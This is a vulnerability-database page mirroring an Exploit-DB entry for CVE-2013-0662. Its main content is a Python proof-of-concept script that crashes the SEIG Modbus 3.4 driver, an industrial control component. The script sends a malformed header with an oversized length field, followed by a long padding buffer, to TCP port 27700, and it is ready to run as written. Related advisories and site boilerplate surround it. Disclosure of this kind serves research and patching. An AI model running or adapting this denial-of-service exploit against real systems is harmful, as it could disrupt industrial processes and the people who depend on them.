Lucene search
K

SEIG Modbus 3.4 - Denial of Service (PoC)

🗓️ 20 Aug 2018 00:00:00Reported by Alejandro ParodiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 191 Views

SEIG Modbus 3.4 Denial of Service (PoC) Windows

Related
Code
ReporterTitlePublishedViews
Family
0day.today
SEIG Modbus 3.4 - Denial of Service Exploit
20 Aug 201800:00
zdt
0day.today
SEIG Modbus 3.4 - Remote Code Execution Exploit
20 Aug 201800:00
zdt
Circl
CVE-2013-0662
20 Aug 201821:18
circl
Check Point Advisories
Scada Modbus Incorrect Packet Length (CVE-2013-0662)
19 Mar 201200:00
checkpoint_advisories
CVE
CVE-2013-0662
28 Mar 201419:00
cve
Cvelist
CVE-2013-0662
28 Mar 201419:00
cvelist
Exploit DB
SEIG Modbus 3.4 - Remote Code Execution
20 Aug 201800:00
exploitdb
exploitpack
SEIG Modbus 3.4 - Denial of Service (PoC)
20 Aug 201800:00
exploitpack
exploitpack
SEIG Modbus 3.4 - Remote Code Execution
20 Aug 201800:00
exploitpack
ICS
Schneider Electric Serial Modbus Driver Buffer Overflow
6 Sep 201812:00
ics
Rows per page
# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
# Version: v3.4
# Tested on: Windows7 x86
# CVE: CVE-2013-0662
# References: 
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662

import socket
import struct
import time

ip = "192.168.127.137"
port = 27700
con = (ip, port)

header_padding = "\x00\xAA"
header_buffer_size = "\xFF\xFF"
header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
header_end = "\xFF"

header = header_padding + header_buffer_size + header_recv_len + header_end
message = "\x00\x64" + "A" * 2267

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(header)
s.send(message)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Aug 2018 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 29.3
EPSS0.50578
191